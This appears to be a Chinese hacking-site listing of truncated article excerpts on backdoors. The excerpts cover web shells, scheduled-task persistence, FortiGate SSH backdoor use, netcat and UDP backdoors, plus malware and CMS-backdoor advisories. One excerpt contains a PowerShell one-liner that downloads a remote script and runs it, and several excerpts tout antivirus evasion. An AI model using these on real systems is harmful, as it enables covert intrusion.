记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

web后门生成工具WeBaCoo和实战

webacoo(web backdoor cookie)是一个web后门脚本工具包,旨在通过HTTP在客户端和web服务器之间提供类似隐形终端连接。它是一个后渗透利用工具,能够维持对已被拿下的web服务器的权限访问。WeBaCoo可以绕过最新的AV,NIDS,IPS,网络防火墙和应用防火墙的检测,能够在被拿下的服务器中悄无声息的执行系统命令这种混淆的通信是在有效的客户端HTTP请求和服务器响应中利用HTTP头信息cookie字段来完成的。使用WeBaCoo生成PHP后门文件的命令如下:webacoo -g -o /root/backdoor.php只要攻击者将恶意代码发送到某个网站以便访问
发布时间:2018-09-03 12:20 | 阅读:95573 | 评论:0 | 标签:Web安全 backdoor getshell webacoo 后门

Schtasks Backdoor:权限维持后门

项目主页 https://github.com/re4lity/Schtasks-Backdoor 简介 一款权限维持后门PowerShell脚本 Author:xiaocheng 小城 Mail:passthru.bug@gmail.com 原理是:schtasks+regsvr32 作用 内网维持权限方法的一种。免杀效果好,重启生效。支持msf反弹,nc反弹,客户端不会用明显异常 自定义执行命令会有弹框(可以自己修改,思路可以使用mshta),一般实战中用nc或者msf。 使用方法 远程调用命令powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://8.8.8.8/Invoke-ta
发布时间:2016-10-18 07:05 | 阅读:298559 | 评论:0 | 标签:工具 Backdoor powershell Schtasks Backdoor 后门 权限维持

技术揭秘:黑客是如何利用Metasploit接管后门和僵尸网络的?

Metasploit Framework中有很多漏洞利用模块,包括缓冲区溢出,浏览器漏洞利用,Web应用程序漏洞,后门利用,僵尸接管工具等。Exploit开发者以及对这个框架有贡献的人已经分享了很多有趣并且有用的东西。这篇文章中,我们将讨论利用Metasploit来攻击并接管常见的后门和僵尸网络的话题。我们不会深入研究所有的模块,但是会提到一些在未来渗透测试或者工作时会用到的模块。我们不会开发Exploit,所以不需要你使用调试器和代码编辑器。如果你刚开始利用Msfconsole(框架的一个命令行接口)来使用Metasploit Framework,不必担心,这里会一步一步地教你怎么使用漏洞利用模块。这个教程只需要你做一件事,在你的攻击机上安装Metasploit,我建议你使用Kali L
发布时间:2016-04-05 21:30 | 阅读:105163 | 评论:0 | 标签:系统安全 网络安全 Backdoor botnets Metasploit pwnage 后门

飞塔SSH后门 进一步利用方法

from:tools.pwn.ren 昨天FortiGate爆了一个SSH Backdoor ,具体内容可以看这(http://tools.pwn.ren/2016/01/12/ssh-backdoor-for-fortigate-os-version-4-up-to-5-0-7.html) 那我们如何利用了?如何利用这个SSH 后门进入到内网了?好了这就是这篇文章要讲的东西。 这个后门获取到的是防火墙的root权限,就是所有防火墙的操作我们都可以做,这里我们利用防火墙的 vpn服务来进入到内网中 ,从而进行进一步渗透。 0X00 先看下用户组 show user group 0x01开启vpn config vpn pptp set status enable set eip 192
发布时间:2016-01-14 02:10 | 阅读:110440 | 评论:0 | 标签:Linux/Unix Backdoor fortigate OS ssh 后门 飞塔

Windows、Linux后门解析

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!本文作者:secdarker操作系统后门学习—Windows篇0×00 准备工作假设用户以管理员权限登录系统,在Windows 7系统上使用netcat 创建一个后门。Netcat 功能比较单一, 缺少了许多我们渗透工作中需要的功能。为此我们将创建一个便携式的工具包来解决这个问题 :1.下载额外的文件和附加持续.2.编辑修改指定文件.3.快速创建执行后门.4.控制远程服务器并进行恶作剧 :)为了便于你第一时间获取到你的工具包,你需要将它放置在一个独立的U盘或者在线服务器上。便携式工具(Portable Applications)便携式工具是那些不需要安装就能直接使用的程序,它们往往
发布时间:2016-01-02 16:05 | 阅读:252635 | 评论:0 | 标签:系统安全 Backdoor linux windows 后门

Xcode木马样本分析及被挂马的红包插件

本文作者:360NirvanTeam(涅磐团队)一 受影响app通过我们对Top1000 的扫描,发现以下app版本受影响微信 -6.2.5 滴滴出行 - 4.0.0滴滴打车 - 3.9.7联通手机营业厅 - 3.2高德地图 - 7.3.8.2037铁路12306 - 2.1同花顺 - 9.26.03同花顺- 9.26.01 自由之战 - 1.0.9我叫MT - 4.6.2我叫MT 2 - 1.8.5电话归属地助手 - 3.6.3夫妻床头话&n
发布时间:2015-09-19 01:30 | 阅读:78463 | 评论:0 | 标签:终端安全 网络安全 Backdoor Xcode 后门 挂马

BCTF 2015 WEB题目通关攻略(Writeup)

关于bctf: BCTF是由蓝莲花战队举办的网络安全夺旗挑战赛,去年只面向国内,从今年开始,我们将向全世界开放,欢迎全球各地的小伙伴们参加!我们将为优胜者提供奖励。 今年的BCTF也是全国网络安全技术对抗联赛XCTF的分站赛之一,获胜的中国XCTF队伍将直接晋级南京的XCTF总决赛(决赛也由蓝莲花战队命题)。其他参赛的XCTF队伍也将获得积分,来竞争XCTF决赛的其他席位。 2015年战况:217, PPP 和 tomcr00se赢得了前三。 主要有下面一些题目   Checkin 10 Desc: Please checkin at IRC IRC: http://webchat.freenode.net/ Channels: bctf Bulletin board:[BCTF 2015
发布时间:2015-03-25 04:50 | 阅读:299046 | 评论:0 | 标签:CTF $ nc 146.148.60.107 6666 $ nc 146.148.79.13 55173 217 ba

渗透测试中密码扫描与破解小结

0x00 前言                 一次测试的过程总会涉及到”密码”与”加解密”。在踩点的过程中,对弱口令的尝试是必不可少的过程,从xx抓鸡到内网哈希批量传递,从个人PC到网络设备/工控设施,只要依旧采用单因素模式的密码认证,密码扫描就不会被遗忘。以下笔者简单分享总结安全测试中密码扫描与破解的技巧,如有疏漏错误,还望 不吝赐教。   0x01 整理一份优秀的字典 想破解密码,要求我们已经”拥有”别人的密码。字典在口令扫描尝试过程中的重要性不言而喻。要整理一份优秀的字典,不妨参考各大网站泄漏数据库,将密码(明文)字段收集后,依出现频率先后生成字典。 一个demo脚本:#!/bin/bash/python import
发布时间:2014-12-25 07:25 | 阅读:127150 | 评论:1 | 标签:安全文献 backdoor Burp Suite BurpSuite Cupp.py Fcrackzip GPU Has

紧急预警“齐博CMS整站系统(qiboCMS)”后门事件

今日,知道创宇安全团队发现“齐博CMS整站系统(qiboCMS)”官方下载的安装文件包里被植入恶意网站木马文件。当站长用户下载安装后,导致网站被“感染”该恶意后门使网站沦为“肉鸡”。我们立即启动了应急方案,已积极联系齐博CMS官方,并发布紧急预警,请站长们暂停下载安装齐博CMS对于近期下载安装过齐博CMS的朋友,请参考下面的解决方案。 关于“齐博CMS整站系统(qiboCMS)” 齐博CMS系统是国内领先的开源内容管理系统之一,凭借着独创的可视化标签技术优势,使得页面的管理维护与风格的制作的门槛降低到最低程度。因此而深受广大用户喜爱。 官方网站:http://www.qibosoft.com/product_cms.htm 后门文件分析 经过我们分析发现黑客在齐博CMS整站系统的安装文件包里做了如下篡改: 1、
发布时间:2014-10-23 16:35 | 阅读:123395 | 评论:0 | 标签:技术分享 backdoor cms php qibocms 后门

一种基于嗅探的UDP后门[附源码]

设计思路:监听34249端口传入的流量并寻找带有特征的数据包。当数据包的特征被匹配的时候,程序会执行这个其中包含的加密的指令。所有的UDP通信数据。如果某 一个数据包中的源端口和port_from_data()返回的端口一致,那么这个数据包的内容将被解密,将其中的指令传入system()调用执行。后门程序需要在root权限下运行,这样才拥有足够的权限利用libcap来监听网络通讯。进程名称:为了隐藏进程不被好事的管理员发现,要做的第一件事就是伪装进程名称。这里用到了一个linux守护进程,不过是放在和通常目录不同的目录下。我用的目录 是/usr/libexec/udevd,而这个守护进程通常是放在/sbin/udevd下的。这样做的是为了用一个看起来不显眼的名称或者说相似的名 称,达到不引起管理员怀疑的目的。抓
发布时间:2013-08-31 15:25 | 阅读:116425 | 评论:0 | 标签:国外神器 backdoor linux 后门

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云